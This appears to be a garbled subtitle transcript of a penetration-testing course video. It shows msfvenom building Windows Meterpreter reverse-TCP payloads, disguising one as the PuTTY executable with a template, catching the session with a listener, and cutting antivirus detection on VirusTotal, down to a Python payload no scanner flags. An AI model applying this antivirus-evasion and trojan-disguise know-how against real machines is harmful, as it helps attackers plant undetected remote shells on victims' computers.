1
00:00:00,970 --> 00:00:03,530
And here it is, the scan has finished.

2
00:00:03,880 --> 00:00:11,350
Right now we get the number of 38 out of sixty seven, so we successfully managed to bypass five additional

3
00:00:11,350 --> 00:00:17,350
antivirus software is using the additional commands that we added to our MSF run on Paillard.

4
00:00:18,620 --> 00:00:25,070
However, let's try to make it even less than this, just by using the massive one, there is another

5
00:00:25,070 --> 00:00:28,340
option that we can do, which is dash X.

6
00:00:28,820 --> 00:00:35,150
And if we go to the help menu right here, we can see the Desh X stands for template.

7
00:00:36,200 --> 00:00:42,830
X allows us to use another program as its template, in other words, this means we can make our payload

8
00:00:43,010 --> 00:00:45,320
look similar to that other program.

9
00:00:46,310 --> 00:00:51,500
Now, this sometimes knows not to work, but let's give it a try and see whether we managed to bypass

10
00:00:51,500 --> 00:00:53,330
more anti viruses with this.

11
00:00:54,680 --> 00:01:00,740
For this, we can use any program that we want, I'm going to go with the program called Party, so

12
00:01:00,740 --> 00:01:03,140
I'm going to go right here and type party.

13
00:01:04,550 --> 00:01:09,230
You can use any other executable file that you want and download party.

14
00:01:09,230 --> 00:01:10,490
I will click on that link.

15
00:01:11,460 --> 00:01:17,760
It tells me you can download party here, I will click on here, and if I go all the way down, I am

16
00:01:17,760 --> 00:01:19,580
searching for the executable files.

17
00:01:20,610 --> 00:01:28,170
And here it is, 64 bit party that I will click on this and I will save it in my downloads folder.

18
00:01:29,260 --> 00:01:35,410
Great, I'll work on, OK, and if I go right here, open the download folder here, I will have the

19
00:01:35,410 --> 00:01:42,460
party executable and just in case you don't know, on Windows Party executable looks like this.

20
00:01:44,000 --> 00:01:49,370
So it has this icon and it is called Partito, to remember how it looks.

21
00:01:49,400 --> 00:01:53,990
Let me just delete it real quick and I will open terminal in my downloads folder.

22
00:01:55,230 --> 00:02:03,810
And run the command MSF, when I'm happy, I will use the 60 48 interpreter underscore reverse DCP Alto's

23
00:02:03,810 --> 00:02:05,610
will be one or two of the 168 that fund.

24
00:02:05,610 --> 00:02:08,460
The 12 outport will be equal to five five five five.

25
00:02:08,670 --> 00:02:14,950
And I will only add the dash X option and select the program of party that exit.

26
00:02:15,240 --> 00:02:19,690
Now, if you're using some other executable here, you specify the name of the other executable.

27
00:02:19,890 --> 00:02:26,430
Just make sure that you are located in the same directory where that executable file is in order to

28
00:02:26,430 --> 00:02:27,150
run this command.

29
00:02:28,020 --> 00:02:37,320
After that, I can specify that it is format of EXI and output will be capital party dot exi press enter.

30
00:02:38,850 --> 00:02:44,520
So the creation of the payload has finished, and if I go and show you how the payload looks like on

31
00:02:44,520 --> 00:02:45,420
the Windows machine.

32
00:02:46,480 --> 00:02:52,660
Let me just find this, and if I go and copy the party with the capital P to my desktop.

33
00:02:53,750 --> 00:02:59,550
Here we can see it looks exactly the same as the previous file that I showed you just in this case.

34
00:02:59,570 --> 00:03:00,990
This is our interpreter.

35
00:03:01,640 --> 00:03:02,780
Let me show you real quick.

36
00:03:03,050 --> 00:03:12,710
If I go and open myself, consul, and they set up the multi handle lisner, so multi handler said Paillard

37
00:03:12,710 --> 00:03:15,470
could be Windows Xixi form interpreter.

38
00:03:17,730 --> 00:03:27,590
Rivers underscored DCP set out to be one of the 168 of 112 pancit airport to be Phi Phi Phi Phi Phi

39
00:03:27,750 --> 00:03:29,010
type run here.

40
00:03:29,460 --> 00:03:36,750
And then I run this party to go back to my clinics and we will have the third session, one opened,

41
00:03:37,080 --> 00:03:37,710
get user.

42
00:03:37,710 --> 00:03:41,010
It will tell me the time, this Winterstein machine.

43
00:03:41,700 --> 00:03:42,360
OK, great.

44
00:03:42,360 --> 00:03:44,170
But this is out of the scope for this video.

45
00:03:45,210 --> 00:03:51,630
Let us check out what the detection rate thus this newly generated payload have.

46
00:03:51,910 --> 00:03:53,010
So let's go right here.

47
00:03:53,190 --> 00:03:58,500
Just file navigates to downloads because there is where our party is.

48
00:03:58,800 --> 00:04:02,070
Select the payload and confirm upload.

49
00:04:03,170 --> 00:04:09,170
And let's see if we generate a payload with a template, do we managed to bypass more anti viruses then

50
00:04:09,170 --> 00:04:10,910
with the previous two payloads?

51
00:04:11,490 --> 00:04:17,500
And it seems that we do in the previous one, we had 38 out of 67.

52
00:04:17,870 --> 00:04:20,860
Right now we have twenty nine out of sixty nine.

53
00:04:21,260 --> 00:04:24,780
So we managed to bypass additional eight antivirus vendors.

54
00:04:25,580 --> 00:04:26,020
Great.

55
00:04:26,060 --> 00:04:27,800
This looks better than the last two.

56
00:04:28,490 --> 00:04:31,730
I'm going to control see this or just close this.

57
00:04:31,730 --> 00:04:37,520
And of course, if you wanted to generate a fully undetectable payload with MSF one, you can always

58
00:04:37,520 --> 00:04:41,060
change the file format, but that comes with other problems.

59
00:04:41,480 --> 00:04:42,640
Let me show you real quick.

60
00:04:43,040 --> 00:04:48,380
So if I go right here and we download and let's say we wanted to generate the Windows payload, but

61
00:04:48,380 --> 00:04:51,230
not as an equal, but there's a python file.

62
00:04:51,710 --> 00:05:04,850
We can run the command MSF when there should be Windows X 64 interpretor reverse DCP almost equals one.

63
00:05:04,850 --> 00:05:11,500
Let's do that 168 at 112 outport equals five five five five dash F is something that we want to change.

64
00:05:11,510 --> 00:05:17,330
So it is no longer going to be it is going to be a python file and we output it.

65
00:05:18,020 --> 00:05:26,660
We deshwal as a python underscore payload that by press enter and this will create the Windows method.

66
00:05:26,660 --> 00:05:29,150
Better payload just as a python file.

67
00:05:30,090 --> 00:05:37,290
Here it is, it is done, and if we go to varas total, upload the Python payload right here, confirm

68
00:05:37,290 --> 00:05:43,560
the upload and we can see no antivirus is able to detect it as a malicious program.

69
00:05:44,040 --> 00:05:49,340
It is effused or in other words, it is fully undetectable payload.

70
00:05:50,220 --> 00:05:56,310
However, how are you going to run it on the target machine when those machines do not have python installed

71
00:05:56,310 --> 00:05:58,460
by default like Linux machines do?

72
00:05:58,830 --> 00:06:03,720
So this payload would only be useful if the target machine has Python installed.

73
00:06:04,140 --> 00:06:08,340
Otherwise it is completely useless as it cannot run without Python.

74
00:06:09,450 --> 00:06:15,510
OK, great, we covered them as a one and some of its comments, I advise you to experiment even more

75
00:06:15,510 --> 00:06:19,990
with the MSM fandom and for example, you can start creating other payloads if you want.

76
00:06:20,490 --> 00:06:25,410
We only created Winters' payloads, but if you have a Linux machine or a Mako's machine that you want

77
00:06:25,410 --> 00:06:31,590
to attack, you can generate payloads for those operating systems as well to check out all the available

78
00:06:31,590 --> 00:06:32,760
payloads that you can create.

79
00:06:32,970 --> 00:06:36,560
You can type the command right here, MSF one.

80
00:06:37,640 --> 00:06:45,010
That's stash list and then payloads and here we can see a lot of different ones, we can go up here.

81
00:06:45,010 --> 00:06:48,590
Here are only Windows payloads, but if we scroll all the way up.

82
00:06:50,000 --> 00:06:55,790
Here are Solaris payloads, Ruby payloads, and these are just some programming languages, but here,

83
00:06:55,790 --> 00:07:01,520
if we scroll all the way up, we get to the OSX payload so you can attack OSX operating systems.

84
00:07:01,790 --> 00:07:07,600
If we go even more up here on Linux operating systems and Linux matter better reverse DC payloads.

85
00:07:08,030 --> 00:07:10,220
We also get the Shell payloads.

86
00:07:10,680 --> 00:07:14,320
We get up here to Linux payloads for the 64 bit systems as well.

87
00:07:14,660 --> 00:07:17,420
So you can attack any operating system that you want.

88
00:07:18,600 --> 00:07:24,900
Great, now that we took a look at MSF and we covered some of its options, let's also take a look at

89
00:07:24,900 --> 00:07:27,840
some other tools that we can use for payload creation.

90
00:07:28,440 --> 00:07:29,400
See you in the next video.